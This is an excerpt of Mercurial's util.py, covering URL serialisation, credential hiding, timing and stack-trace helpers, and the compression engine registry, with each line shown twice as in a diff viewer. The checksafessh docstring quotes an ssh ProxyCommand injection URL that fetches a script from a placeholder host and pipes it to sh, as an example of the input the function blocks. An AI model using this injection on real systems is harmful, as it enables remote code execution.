2765 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
2766 if self.user or self.passwd:
2766 if self.user or self.passwd:
2767 s += '@'
2767 s += '@'
2768 if self.host:
2768 if self.host:
2769 if not (self.host.startswith('[') and self.host.endswith(']')):
2769 if not (self.host.startswith('[') and self.host.endswith(']')):
2770 s += urlreq.quote(self.host)
2770 s += urlreq.quote(self.host)
2771 else:
2771 else:
2772 s += self.host
2772 s += self.host
2773 if self.port:
2773 if self.port:
2774 s += ':' + urlreq.quote(self.port)
2774 s += ':' + urlreq.quote(self.port)
2775 if self.host:
2775 if self.host:
2776 s += '/'
2776 s += '/'
2777 if self.path:
2777 if self.path:
2778 # TODO: similar to the query string, we should not unescape the
2778 # TODO: similar to the query string, we should not unescape the
2779 # path when we store it, the path might contain '%2f' = '/',
2779 # path when we store it, the path might contain '%2f' = '/',
2780 # which we should *not* escape.
2780 # which we should *not* escape.
2781 s += urlreq.quote(self.path, safe=self._safepchars)
2781 s += urlreq.quote(self.path, safe=self._safepchars)
2782 if self.query:
2782 if self.query:
2783 # we store the query in escaped form.
2783 # we store the query in escaped form.
2784 s += '?' + self.query
2784 s += '?' + self.query
2785 if self.fragment is not None:
2785 if self.fragment is not None:
2786 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
2786 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
2787 return s
2787 return s
2788
2788
2789 __str__ = encoding.strmethod(__bytes__)
2789 __str__ = encoding.strmethod(__bytes__)
2790
2790
2791 def authinfo(self):
2791 def authinfo(self):
2792 user, passwd = self.user, self.passwd
2792 user, passwd = self.user, self.passwd
2793 try:
2793 try:
2794 self.user, self.passwd = None, None
2794 self.user, self.passwd = None, None
2795 s = bytes(self)
2795 s = bytes(self)
2796 finally:
2796 finally:
2797 self.user, self.passwd = user, passwd
2797 self.user, self.passwd = user, passwd
2798 if not self.user:
2798 if not self.user:
2799 return (s, None)
2799 return (s, None)
2800 # authinfo[1] is passed to urllib2 password manager, and its
2800 # authinfo[1] is passed to urllib2 password manager, and its
2801 # URIs must not contain credentials. The host is passed in the
2801 # URIs must not contain credentials. The host is passed in the
2802 # URIs list because Python < 2.4.3 uses only that to search for
2802 # URIs list because Python < 2.4.3 uses only that to search for
2803 # a password.
2803 # a password.
2804 return (s, (None, (s, self.host),
2804 return (s, (None, (s, self.host),
2805 self.user, self.passwd or ''))
2805 self.user, self.passwd or ''))
2806
2806
2807 def isabs(self):
2807 def isabs(self):
2808 if self.scheme and self.scheme != 'file':
2808 if self.scheme and self.scheme != 'file':
2809 return True # remote URL
2809 return True # remote URL
2810 if hasdriveletter(self.path):
2810 if hasdriveletter(self.path):
2811 return True # absolute for our purposes - can't be joined()
2811 return True # absolute for our purposes - can't be joined()
2812 if self.path.startswith(br'\\'):
2812 if self.path.startswith(br'\\'):
2813 return True # Windows UNC path
2813 return True # Windows UNC path
2814 if self.path.startswith('/'):
2814 if self.path.startswith('/'):
2815 return True # POSIX-style
2815 return True # POSIX-style
2816 return False
2816 return False
2817
2817
2818 def localpath(self):
2818 def localpath(self):
2819 if self.scheme == 'file' or self.scheme == 'bundle':
2819 if self.scheme == 'file' or self.scheme == 'bundle':
2820 path = self.path or '/'
2820 path = self.path or '/'
2821 # For Windows, we need to promote hosts containing drive
2821 # For Windows, we need to promote hosts containing drive
2822 # letters to paths with drive letters.
2822 # letters to paths with drive letters.
2823 if hasdriveletter(self._hostport):
2823 if hasdriveletter(self._hostport):
2824 path = self._hostport + '/' + self.path
2824 path = self._hostport + '/' + self.path
2825 elif (self.host is not None and self.path
2825 elif (self.host is not None and self.path
2826 and not hasdriveletter(path)):
2826 and not hasdriveletter(path)):
2827 path = '/' + path
2827 path = '/' + path
2828 return path
2828 return path
2829 return self._origpath
2829 return self._origpath
2830
2830
2831 def islocal(self):
2831 def islocal(self):
2832 '''whether localpath will return something that posixfile can open'''
2832 '''whether localpath will return something that posixfile can open'''
2833 return (not self.scheme or self.scheme == 'file'
2833 return (not self.scheme or self.scheme == 'file'
2834 or self.scheme == 'bundle')
2834 or self.scheme == 'bundle')
2835
2835
2836 def hasscheme(path):
2836 def hasscheme(path):
2837 return bool(url(path).scheme)
2837 return bool(url(path).scheme)
2838
2838
2839 def hasdriveletter(path):
2839 def hasdriveletter(path):
2840 return path and path[1:2] == ':' and path[0:1].isalpha()
2840 return path and path[1:2] == ':' and path[0:1].isalpha()
2841
2841
2842 def urllocalpath(path):
2842 def urllocalpath(path):
2843 return url(path, parsequery=False, parsefragment=False).localpath()
2843 return url(path, parsequery=False, parsefragment=False).localpath()
2844
2844
2845 def checksafessh(path):
2845 def checksafessh(path):
2846 """check if a path / url is a potentially unsafe ssh exploit (SEC)
2846 """check if a path / url is a potentially unsafe ssh exploit (SEC)
2847
2847
2848 This is a sanity check for ssh urls. ssh will parse the first item as
2848 This is a sanity check for ssh urls. ssh will parse the first item as
2849 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
2849 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
2850 Let's prevent these potentially exploited urls entirely and warn the
2850 Let's prevent these potentially exploited urls entirely and warn the
2851 user.
2851 user.
2852
2852
2853 Raises an error.Abort when the url is unsafe.
2853 Raises an error.Abort when the url is unsafe.
2854 """
2854 """
2855 path = urlreq.unquote(path)
2855 path = urlreq.unquote(path)
2856 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
2856 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
2857 raise error.Abort(_('potentially unsafe url: %r') %
2857 raise error.Abort(_('potentially unsafe url: %r') %
2858 (pycompat.bytestr(path),))
2858 (pycompat.bytestr(path),))
2859
2859
2860 def hidepassword(u):
2860 def hidepassword(u):
2861 '''hide user credential in a url string'''
2861 '''hide user credential in a url string'''
2862 u = url(u)
2862 u = url(u)
2863 if u.passwd:
2863 if u.passwd:
2864 u.passwd = '***'
2864 u.passwd = '***'
2865 return bytes(u)
2865 return bytes(u)
2866
2866
2867 def removeauth(u):
2867 def removeauth(u):
2868 '''remove all authentication information from a url string'''
2868 '''remove all authentication information from a url string'''
2869 u = url(u)
2869 u = url(u)
2870 u.user = u.passwd = None
2870 u.user = u.passwd = None
2871 return bytes(u)
2871 return bytes(u)
2872
2872
2873 timecount = unitcountfn(
2873 timecount = unitcountfn(
2874 (1, 1e3, _('%.0f s')),
2874 (1, 1e3, _('%.0f s')),
2875 (100, 1, _('%.1f s')),
2875 (100, 1, _('%.1f s')),
2876 (10, 1, _('%.2f s')),
2876 (10, 1, _('%.2f s')),
2877 (1, 1, _('%.3f s')),
2877 (1, 1, _('%.3f s')),
2878 (100, 0.001, _('%.1f ms')),
2878 (100, 0.001, _('%.1f ms')),
2879 (10, 0.001, _('%.2f ms')),
2879 (10, 0.001, _('%.2f ms')),
2880 (1, 0.001, _('%.3f ms')),
2880 (1, 0.001, _('%.3f ms')),
2881 (100, 0.000001, _('%.1f us')),
2881 (100, 0.000001, _('%.1f us')),
2882 (10, 0.000001, _('%.2f us')),
2882 (10, 0.000001, _('%.2f us')),
2883 (1, 0.000001, _('%.3f us')),
2883 (1, 0.000001, _('%.3f us')),
2884 (100, 0.000000001, _('%.1f ns')),
2884 (100, 0.000000001, _('%.1f ns')),
2885 (10, 0.000000001, _('%.2f ns')),
2885 (10, 0.000000001, _('%.2f ns')),
2886 (1, 0.000000001, _('%.3f ns')),
2886 (1, 0.000000001, _('%.3f ns')),
2887 )
2887 )
2888
2888
2889 _timenesting = [0]
2889 _timenesting = [0]
2890
2890
2891 def timed(func):
2891 def timed(func):
2892 '''Report the execution time of a function call to stderr.
2892 '''Report the execution time of a function call to stderr.
2893
2893
2894 During development, use as a decorator when you need to measure
2894 During development, use as a decorator when you need to measure
2895 the cost of a function, e.g. as follows:
2895 the cost of a function, e.g. as follows:
2896
2896
2897 @util.timed
2897 @util.timed
2898 def foo(a, b, c):
2898 def foo(a, b, c):
2899 pass
2899 pass
2900 '''
2900 '''
2901
2901
2902 def wrapper(*args, **kwargs):
2902 def wrapper(*args, **kwargs):
2903 start = timer()
2903 start = timer()
2904 indent = 2
2904 indent = 2
2905 _timenesting[0] += indent
2905 _timenesting[0] += indent
2906 try:
2906 try:
2907 return func(*args, **kwargs)
2907 return func(*args, **kwargs)
2908 finally:
2908 finally:
2909 elapsed = timer() - start
2909 elapsed = timer() - start
2910 _timenesting[0] -= indent
2910 _timenesting[0] -= indent
2911 stderr.write('%s%s: %s\n' %
2911 stderr.write('%s%s: %s\n' %
2912 (' ' * _timenesting[0], func.__name__,
2912 (' ' * _timenesting[0], func.__name__,
2913 timecount(elapsed)))
2913 timecount(elapsed)))
2914 return wrapper
2914 return wrapper
2915
2915
2916 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
2916 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
2917 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
2917 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
2918
2918
2919 def sizetoint(s):
2919 def sizetoint(s):
2920 '''Convert a space specifier to a byte count.
2920 '''Convert a space specifier to a byte count.
2921
2921
2922 >>> sizetoint(b'30')
2922 >>> sizetoint(b'30')
2923 30
2923 30
2924 >>> sizetoint(b'2.2kb')
2924 >>> sizetoint(b'2.2kb')
2925 2252
2925 2252
2926 >>> sizetoint(b'6M')
2926 >>> sizetoint(b'6M')
2927 6291456
2927 6291456
2928 '''
2928 '''
2929 t = s.strip().lower()
2929 t = s.strip().lower()
2930 try:
2930 try:
2931 for k, u in _sizeunits:
2931 for k, u in _sizeunits:
2932 if t.endswith(k):
2932 if t.endswith(k):
2933 return int(float(t[:-len(k)]) * u)
2933 return int(float(t[:-len(k)]) * u)
2934 return int(t)
2934 return int(t)
2935 except ValueError:
2935 except ValueError:
2936 raise error.ParseError(_("couldn't parse size: %s") % s)
2936 raise error.ParseError(_("couldn't parse size: %s") % s)
2937
2937
2938 class hooks(object):
2938 class hooks(object):
2939 '''A collection of hook functions that can be used to extend a
2939 '''A collection of hook functions that can be used to extend a
2940 function's behavior. Hooks are called in lexicographic order,
2940 function's behavior. Hooks are called in lexicographic order,
2941 based on the names of their sources.'''
2941 based on the names of their sources.'''
2942
2942
2943 def __init__(self):
2943 def __init__(self):
2944 self._hooks = []
2944 self._hooks = []
2945
2945
2946 def add(self, source, hook):
2946 def add(self, source, hook):
2947 self._hooks.append((source, hook))
2947 self._hooks.append((source, hook))
2948
2948
2949 def __call__(self, *args):
2949 def __call__(self, *args):
2950 self._hooks.sort(key=lambda x: x[0])
2950 self._hooks.sort(key=lambda x: x[0])
2951 results = []
2951 results = []
2952 for source, hook in self._hooks:
2952 for source, hook in self._hooks:
2953 results.append(hook(*args))
2953 results.append(hook(*args))
2954 return results
2954 return results
2955
2955
2956 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%d', depth=0):
2956 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%d', depth=0):
2957 '''Yields lines for a nicely formatted stacktrace.
2957 '''Yields lines for a nicely formatted stacktrace.
2958 Skips the 'skip' last entries, then return the last 'depth' entries.
2958 Skips the 'skip' last entries, then return the last 'depth' entries.
2959 Each file+linenumber is formatted according to fileline.
2959 Each file+linenumber is formatted according to fileline.
2960 Each line is formatted according to line.
2960 Each line is formatted according to line.
2961 If line is None, it yields:
2961 If line is None, it yields:
2962 length of longest filepath+line number,
2962 length of longest filepath+line number,
2963 filepath+linenumber,
2963 filepath+linenumber,
2964 function
2964 function
2965
2965
2966 Not be used in production code but very convenient while developing.
2966 Not be used in production code but very convenient while developing.
2967 '''
2967 '''
2968 entries = [(fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
2968 entries = [(fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
2969 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
2969 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
2970 ][-depth:]
2970 ][-depth:]
2971 if entries:
2971 if entries:
2972 fnmax = max(len(entry[0]) for entry in entries)
2972 fnmax = max(len(entry[0]) for entry in entries)
2973 for fnln, func in entries:
2973 for fnln, func in entries:
2974 if line is None:
2974 if line is None:
2975 yield (fnmax, fnln, func)
2975 yield (fnmax, fnln, func)
2976 else:
2976 else:
2977 yield line % (fnmax, fnln, func)
2977 yield line % (fnmax, fnln, func)
2978
2978
2979 def debugstacktrace(msg='stacktrace', skip=0,
2979 def debugstacktrace(msg='stacktrace', skip=0,
2980 f=procutil.stderr, otherf=procutil.stdout, depth=0):
2980 f=procutil.stderr, otherf=procutil.stdout, depth=0):
2981 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
2981 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
2982 Skips the 'skip' entries closest to the call, then show 'depth' entries.
2982 Skips the 'skip' entries closest to the call, then show 'depth' entries.
2983 By default it will flush stdout first.
2983 By default it will flush stdout first.
2984 It can be used everywhere and intentionally does not require an ui object.
2984 It can be used everywhere and intentionally does not require an ui object.
2985 Not be used in production code but very convenient while developing.
2985 Not be used in production code but very convenient while developing.
2986 '''
2986 '''
2987 if otherf:
2987 if otherf:
2988 otherf.flush()
2988 otherf.flush()
2989 f.write('%s at:\n' % msg.rstrip())
2989 f.write('%s at:\n' % msg.rstrip())
2990 for line in getstackframes(skip + 1, depth=depth):
2990 for line in getstackframes(skip + 1, depth=depth):
2991 f.write(line)
2991 f.write(line)
2992 f.flush()
2992 f.flush()
2993
2993
2994 class dirs(object):
2994 class dirs(object):
2995 '''a multiset of directory names from a dirstate or manifest'''
2995 '''a multiset of directory names from a dirstate or manifest'''
2996
2996
2997 def __init__(self, map, skip=None):
2997 def __init__(self, map, skip=None):
2998 self._dirs = {}
2998 self._dirs = {}
2999 addpath = self.addpath
2999 addpath = self.addpath
3000 if safehasattr(map, 'iteritems') and skip is not None:
3000 if safehasattr(map, 'iteritems') and skip is not None:
3001 for f, s in map.iteritems():
3001 for f, s in map.iteritems():
3002 if s[0] != skip:
3002 if s[0] != skip:
3003 addpath(f)
3003 addpath(f)
3004 else:
3004 else:
3005 for f in map:
3005 for f in map:
3006 addpath(f)
3006 addpath(f)
3007
3007
3008 def addpath(self, path):
3008 def addpath(self, path):
3009 dirs = self._dirs
3009 dirs = self._dirs
3010 for base in finddirs(path):
3010 for base in finddirs(path):
3011 if base in dirs:
3011 if base in dirs:
3012 dirs[base] += 1
3012 dirs[base] += 1
3013 return
3013 return
3014 dirs[base] = 1
3014 dirs[base] = 1
3015
3015
3016 def delpath(self, path):
3016 def delpath(self, path):
3017 dirs = self._dirs
3017 dirs = self._dirs
3018 for base in finddirs(path):
3018 for base in finddirs(path):
3019 if dirs[base] > 1:
3019 if dirs[base] > 1:
3020 dirs[base] -= 1
3020 dirs[base] -= 1
3021 return
3021 return
3022 del dirs[base]
3022 del dirs[base]
3023
3023
3024 def __iter__(self):
3024 def __iter__(self):
3025 return iter(self._dirs)
3025 return iter(self._dirs)
3026
3026
3027 def __contains__(self, d):
3027 def __contains__(self, d):
3028 return d in self._dirs
3028 return d in self._dirs
3029
3029
3030 if safehasattr(parsers, 'dirs'):
3030 if safehasattr(parsers, 'dirs'):
3031 dirs = parsers.dirs
3031 dirs = parsers.dirs
3032
3032
3033 def finddirs(path):
3033 def finddirs(path):
3034 pos = path.rfind('/')
3034 pos = path.rfind('/')
3035 while pos != -1:
3035 while pos != -1:
3036 yield path[:pos]
3036 yield path[:pos]
3037 pos = path.rfind('/', 0, pos)
3037 pos = path.rfind('/', 0, pos)
3038
3038
3039 # compression code
3039 # compression code
3040
3040
3041 SERVERROLE = 'server'
3041 SERVERROLE = 'server'
3042 CLIENTROLE = 'client'
3042 CLIENTROLE = 'client'
3043
3043
3044 compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
3044 compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
3045 (u'name', u'serverpriority',
3045 (u'name', u'serverpriority',
3046 u'clientpriority'))
3046 u'clientpriority'))
3047
3047
3048 class compressormanager(object):
3048 class compressormanager(object):
3049 """Holds registrations of various compression engines.
3049 """Holds registrations of various compression engines.
3050
3050
3051 This class essentially abstracts the differences between compression
3051 This class essentially abstracts the differences between compression
3052 engines to allow new compression formats to be added easily, possibly from
3052 engines to allow new compression formats to be added easily, possibly from
3053 extensions.
3053 extensions.
3054
3054
3055 Compressors are registered against the global instance by calling its
3055 Compressors are registered against the global instance by calling its
3056 ``register()`` method.
3056 ``register()`` method.
3057 """
3057 """
3058 def __init__(self):
3058 def __init__(self):
3059 self._engines = {}
3059 self._engines = {}
3060 # Bundle spec human name to engine name.
3060 # Bundle spec human name to engine name.
3061 self._bundlenames = {}
3061 self._bundlenames = {}
3062 # Internal bundle identifier to engine name.
3062 # Internal bundle identifier to engine name.
3063 self._bundletypes = {}
3063 self._bundletypes = {}
3064 # Revlog header to engine name.
3064 # Revlog header to engine name.
3065 self._revlogheaders = {}
3065 self._revlogheaders = {}
3066 # Wire proto identifier to engine name.
3066 # Wire proto identifier to engine name.
3067 self._wiretypes = {}
3067 self._wiretypes = {}
3068
3068
3069 def __getitem__(self, key):
3069 def __getitem__(self, key):
3070 return self._engines[key]
3070 return self._engines[key]
3071
3071
3072 def __contains__(self, key):
3072 def __contains__(self, key):
3073 return key in self._engines
3073 return key in self._engines
3074
3074
3075 def __iter__(self):
3075 def __iter__(self):
3076 return iter(self._engines.keys())
3076 return iter(self._engines.keys())
3077
3077
3078 def register(self, engine):
3078 def register(self, engine):
3079 """Register a compression engine with the manager.
3079 """Register a compression engine with the manager.
3080
3080
3081 The argument must be a ``compressionengine`` instance.
3081 The argument must be a ``compressionengine`` instance.
3082 """
3082 """
3083 if not isinstance(engine, compressionengine):
3083 if not isinstance(engine, compressionengine):
3084 raise ValueError(_('argument must be a compressionengine'))
3084 raise ValueError(_('argument must be a compressionengine'))
3085
3085
3086 name = engine.name()
3086 name = engine.name()
3087
3087
3088 if name in self._engines:
3088 if name in self._engines:
3089 raise error.Abort(_('compression engine %s already registered') %
3089 raise error.Abort(_('compression engine %s already registered') %
3090 name)
3090 name)
3091
3091
3092 bundleinfo = engine.bundletype()
3092 bundleinfo = engine.bundletype()
3093 if bundleinfo:
3093 if bundleinfo:
3094 bundlename, bundletype = bundleinfo
3094 bundlename, bundletype = bundleinfo
3095
3095
3096 if bundlename in self._bundlenames:
3096 if bundlename in self._bundlenames:
3097 raise error.Abort(_('bundle name %s already registered') %
3097 raise error.Abort(_('bundle name %s already registered') %
3098 bundlename)
3098 bundlename)
3099 if bundletype in self._bundletypes:
3099 if bundletype in self._bundletypes:
3100 raise error.Abort(_('bundle type %s already registered by %s') %
3100 raise error.Abort(_('bundle type %s already registered by %s') %
3101 (bundletype, self._bundletypes[bundletype]))
3101 (bundletype, self._bundletypes[bundletype]))
3102
3102
3103 # No external facing name declared.
3103 # No external facing name declared.
3104 if bundlename:
3104 if bundlename:
3105 self._bundlenames[bundlename] = name
3105 self._bundlenames[bundlename] = name
3106
3106
3107 self._bundletypes[bundletype] = name
3107 self._bundletypes[bundletype] = name
3108
3108
3109 wiresupport = engine.wireprotosupport()
3109 wiresupport = engine.wireprotosupport()
3110 if wiresupport:
3110 if wiresupport:
3111 wiretype = wiresupport.name
3111 wiretype = wiresupport.name
3112 if wiretype in self._wiretypes:
3112 if wiretype in self._wiretypes:
3113 raise error.Abort(_('wire protocol compression %s already '
3113 raise error.Abort(_('wire protocol compression %s already '
3114 'registered by %s') %
3114 'registered by %s') %
3115 (wiretype, self._wiretypes[wiretype]))
3115 (wiretype, self._wiretypes[wiretype]))
3116
3116
3117 self._wiretypes[wiretype] = name
3117 self._wiretypes[wiretype] = name
3118
3118
3119 revlogheader = engine.revlogheader()
3119 revlogheader = engine.revlogheader()
3120 if revlogheader and revlogheader in self._revlogheaders:
3120 if revlogheader and revlogheader in self._revlogheaders:
3121 raise error.Abort(_('revlog header %s already registered by %s') %
3121 raise error.Abort(_('revlog header %s already registered by %s') %
3122 (revlogheader, self._revlogheaders[revlogheader]))
3122 (revlogheader, self._revlogheaders[revlogheader]))
3123
3123
3124 if revlogheader:
3124 if revlogheader:
3125 self._revlogheaders[revlogheader] = name
3125 self._revlogheaders[revlogheader] = name
3126
3126
3127 self._engines[name] = engine
3127 self._engines[name] = engine
3128
3128
3129 @property
3129 @property
3130 def supportedbundlenames(self):
3130 def supportedbundlenames(self):
3131 return set(self._bundlenames.keys())
3131 return set(self._bundlenames.keys())
3132
3132
3133 @property
3133 @property
3134 def supportedbundletypes(self):
3134 def supportedbundletypes(self):
3135 return set(self._bundletypes.keys())
3135 return set(self._bundletypes.keys())
3136
3136
3137 def forbundlename(self, bundlename):
3137 def forbundlename(self, bundlename):
3138 """Obtain a compression engine registered to a bundle name.
3138 """Obtain a compression engine registered to a bundle name.
3139
3139
3140 Will raise KeyError if the bundle type isn't registered.
3140 Will raise KeyError if the bundle type isn't registered.
3141
3141
3142 Will abort if the engine is known but not available.
3142 Will abort if the engine is known but not available.
3143 """
3143 """
3144 engine = self._engines[self._bundlenames[bundlename]]
3144 engine = self._engines[self._bundlenames[bundlename]]
3145 if not engine.available():
3145 if not engine.available():
3146 raise error.Abort(_('compression engine %s could not be loaded') %
3146 raise error.Abort(_('compression engine %s could not be loaded') %
3147 engine.name())
3147 engine.name())
3148 return engine
3148 return engine
3149
3149
3150 def forbundletype(self, bundletype):
3150 def forbundletype(self, bundletype):
3151 """Obtain a compression engine registered to a bundle type.
3151 """Obtain a compression engine registered to a bundle type.
3152
3152
3153 Will raise KeyError if the bundle type isn't registered.
3153 Will raise KeyError if the bundle type isn't registered.
3154
3154
3155 Will abort if the engine is known but not available.
3155 Will abort if the engine is known but not available.
3156 """
3156 """
3157 engine = self._engines[self._bundletypes[bundletype]]
3157 engine = self._engines[self._bundletypes[bundletype]]
3158 if not engine.available():
3158 if not engine.available():
3159 raise error.Abort(_('compression engine %s could not be loaded') %
3159 raise error.Abort(_('compression engine %s could not be loaded') %
3160 engine.name())
3160 engine.name())
3161 return engine
3161 return engine
3162
3162
3163 def supportedwireengines(self, role, onlyavailable=True):
3163 def supportedwireengines(self, role, onlyavailable=True):
3164 """Obtain compression engines that support the wire protocol.
3164 """Obtain compression engines that support the wire protocol.
3165
3165
3166 Returns a list of engines in prioritized order, most desired first.
3166 Returns a list of engines in prioritized order, most desired first.
3167
3167
3168 If ``onlyavailable`` is set, filter out engines that can't be
3168 If ``onlyavailable`` is set, filter out engines that can't be
3169 loaded.
3169 loaded.
3170 """
3170 """
3171 assert role in (SERVERROLE, CLIENTROLE)
3171 assert role in (SERVERROLE, CLIENTROLE)
3172
3172
3173 attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'
3173 attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'
3174
3174
3175 engines = [self._engines[e] for e in self._wiretypes.values()]
3175 engines = [self._engines[e] for e in self._wiretypes.values()]
3176 if onlyavailable:
3176 if onlyavailable:
3177 engines = [e for e in engines if e.available()]
3177 engines = [e for e in engines if e.available()]
3178
3178
3179 def getkey(e):
3179 def getkey(e):
3180 # Sort first by priority, highest first. In case of tie, sort
3180 # Sort first by priority, highest first. In case of tie, sort
3181 # alphabetically. This is arbitrary, but ensures output is
3181 # alphabetically. This is arbitrary, but ensures output is
3182 # stable.
3182 # stable.
3183 w = e.wireprotosupport()
3183 w = e.wireprotosupport()
3184 return -1 * getattr(w, attr), w.name
3184 return -1 * getattr(w, attr), w.name
3185
3185
3186 return list(sorted(engines, key=getkey))
3186 return list(sorted(engines, key=getkey))
3187
3187
3188 def forwiretype(self, wiretype):
3188 def forwiretype(self, wiretype):
3189 engine = self._engines[self._wiretypes[wiretype]]
3189 engine = self._engines[self._wiretypes[wiretype]]
3190 if not engine.available():
3190 if not engine.available():
3191 raise error.Abort(_('compression engine %s could not be loaded') %
3191 raise error.Abort(_('compression engine %s could not be loaded') %
3192 engine.name())
3192 engine.name())
3193 return engine
3193 return engine
3194
3194
3195 def forrevlogheader(self, header):
3195 def forrevlogheader(self, header):
3196 """Obtain a compression engine registered to a revlog header.
3196 """Obtain a compression engine registered to a revlog header.
3197
3197
3198 Will raise KeyError if the revlog header value isn't registered.
3198 Will raise KeyError if the revlog header value isn't registered.
3199 """
3199 """
3200 return self._engines[self._revlogheaders[header]]
3200 return self._engines[self._revlogheaders[header]]
3201
3201
3202 compengines = compressormanager()
3202 compengines = compressormanager()
3203
3203
3204 class compressionengine(object):
3204 class compressionengine(object):
3205 """Base class for compression engines.
3205 """Base class for compression engines.
3206
3206
3207 Compression engines must implement the interface defined by this class.
3207 Compression engines must implement the interface defined by this class.
3208 """
3208 """
3209 def name(self):
3209 def name(self):
3210 """Returns the name of the compression engine.
3210 """Returns the name of the compression engine.
3211
3211
3212 This is the key the engine is registered under.
3212 This is the key the engine is registered under.
3213
3213
3214 This method must be implemented.
3214 This method must be implemented.
3215 """
3215 """
3216 raise NotImplementedError()
3216 raise NotImplementedError()
3217
3217
3218 def available(self):
3218 def available(self):
3219 """Whether the compression engine is available.
3219 """Whether the compression engine is available.
3220
3220
3221 The intent of this method is to allow optional compression engines
3221 The intent of this method is to allow optional compression engines
3222 that may not be available in all installations (such as engines relying
3222 that may not be available in all installations (such as engines relying
3223 on C extensions that may not be present).
3223 on C extensions that may not be present).
3224 """
3224 """
3225 return True
3225 return True
3226
3226
3227 def bundletype(self):
3227 def bundletype(self):
3228 """Describes bundle identifiers for this engine.
3228 """Describes bundle identifiers for this engine.
3229
3229
3230 If this compression engine isn't supported for bundles, returns None.
3230 If this compression engine isn't supported for bundles, returns None.
3231
3231
3232 If this engine can be used for bundles, returns a 2-tuple of strings of
3232 If this engine can be used for bundles, returns a 2-tuple of strings of
3233 the user-facing "bundle spec" compression name and an internal
3233 the user-facing "bundle spec" compression name and an internal
3234 identifier used to denote the compression format within bundles. To
3234 identifier used to denote the compression format within bundles. To
3235 exclude the name from external usage, set the first element to ``None``.
3235 exclude the name from external usage, set the first element to ``None``.
3236
3236
3237 If bundle compression is supported, the class must also implement
3237 If bundle compression is supported, the class must also implement
3238 ``compressstream`` and `decompressorreader``.
3238 ``compressstream`` and `decompressorreader``.
3239
3239
3240 The docstring of this method is used in the help system to tell users
3240 The docstring of this method is used in the help system to tell users
3241 about this engine.
3241 about this engine.
3242 """
3242 """
3243 return None
3243 return None
3244
3244
3245 def wireprotosupport(self):
3245 def wireprotosupport(self):
3246 """Declare support for this compression format on the wire protocol.
3246 """Declare support for this compression format on the wire protocol.
3247
3247
3248 If this compression engine isn't supported for compressing wire
3248 If this compression engine isn't supported for compressing wire
3249 protocol payloads, returns None.
3249 protocol payloads, returns None.
3250
3250
3251 Otherwise, returns ``compenginewireprotosupport`` with the following
3251 Otherwise, returns ``compenginewireprotosupport`` with the following
3252 fields:
3252 fields:
3253
3253
3254 * String format identifier
3254 * String format identifier
3255 * Integer priority for the server
3255 * Integer priority for the server
3256 * Integer priority for the client
3256 * Integer priority for the client
3257
3257
3258 The integer priorities are used to order the advertisement of format
3258 The integer priorities are used to order the advertisement of format
3259 support by server and client. The highest integer is advertised
3259 support by server and client. The highest integer is advertised
3260 first. Integers with non-positive values aren't advertised.
3260 first. Integers with non-positive values aren't advertised.
3261
3261
3262 The priority values are somewhat arbitrary and only used for default
3262 The priority values are somewhat arbitrary and only used for default
3263 ordering. The relative order can be changed via config options.
3263 ordering. The relative order can be changed via config options.
3264
3264
3265 If wire protocol compression is supported, the class must also implement
3265 If wire protocol compression is supported, the class must also implement
3266 ``compressstream`` and ``decompressorreader``.
3266 ``compressstream`` and ``decompressorreader``.
3267 """
3267 """
3268 return None
3268 return None
3269
3269
3270 def revlogheader(self):
3270 def revlogheader(self):
3271 """Header added to revlog chunks that identifies this engine.
3271 """Header added to revlog chunks that identifies this engine.
3272
3272
3273 If this engine can be used to compress revlogs, this method should
3273 If this engine can be used to compress revlogs, this method should
3274 return the bytes used to identify chunks compressed with this engine.
3274 return the bytes used to identify chunks compressed with this engine.
3275 Else, the method should return ``None`` to indicate it does not
3275 Else, the method should return ``None`` to indicate it does not
3276 participate in revlog compression.
3276 participate in revlog compression.
3277 """
3277 """
3278 return None
3278 return None
3279
3279
3280 def compressstream(self, it, opts=None):
3280 def compressstream(self, it, opts=None):
3281 """Compress an iterator of chunks.
3281 """Compress an iterator of chunks.
3282
3282
3283 The method receives an iterator (ideally a generator) of chunks of
3283 The method receives an iterator (ideally a generator) of chunks of
3284 bytes to be compressed. It returns an iterator (ideally a generator)
3284 bytes to be compressed. It returns an iterator (ideally a generator)
3285 of bytes of chunks representing the compressed output.
3285 of bytes of chunks representing the compressed output.
3286
3286
3287 Optionally accepts an argument defining how to perform compression.
3287 Optionally accepts an argument defining how to perform compression.
3288 Each engine treats this argument differently.
3288 Each engine treats this argument differently.
3289 """
3289 """
3290 raise NotImplementedError()
3290 raise NotImplementedError()
3291
3291
3292 def decompressorreader(self, fh):
3292 def decompressorreader(self, fh):
3293 """Perform decompression on a file object.
3293 """Perform decompression on a file object.
3294
3294
3295 Argument is an object with a ``read(size)`` method that returns
3295 Argument is an object with a ``read(size)`` method that returns
3296 compressed data. Return value is an object with a ``read(size)`` that
3296 compressed data. Return value is an object with a ``read(size)`` that
3297 returns uncompressed data.
3297 returns uncompressed data.
3298 """
3298 """
3299 raise NotImplementedError()
3299 raise NotImplementedError()
3300
3300
3301 def revlogcompressor(self, opts=None):
3301 def revlogcompressor(self, opts=None):
3302 """Obtain an object that can be used to compress revlog entries.
3302 """Obtain an object that can be used to compress revlog entries.
3303
3303
3304 The object has a ``compress(data)`` method that compresses binary
3304 The object has a ``compress(data)`` method that compresses binary
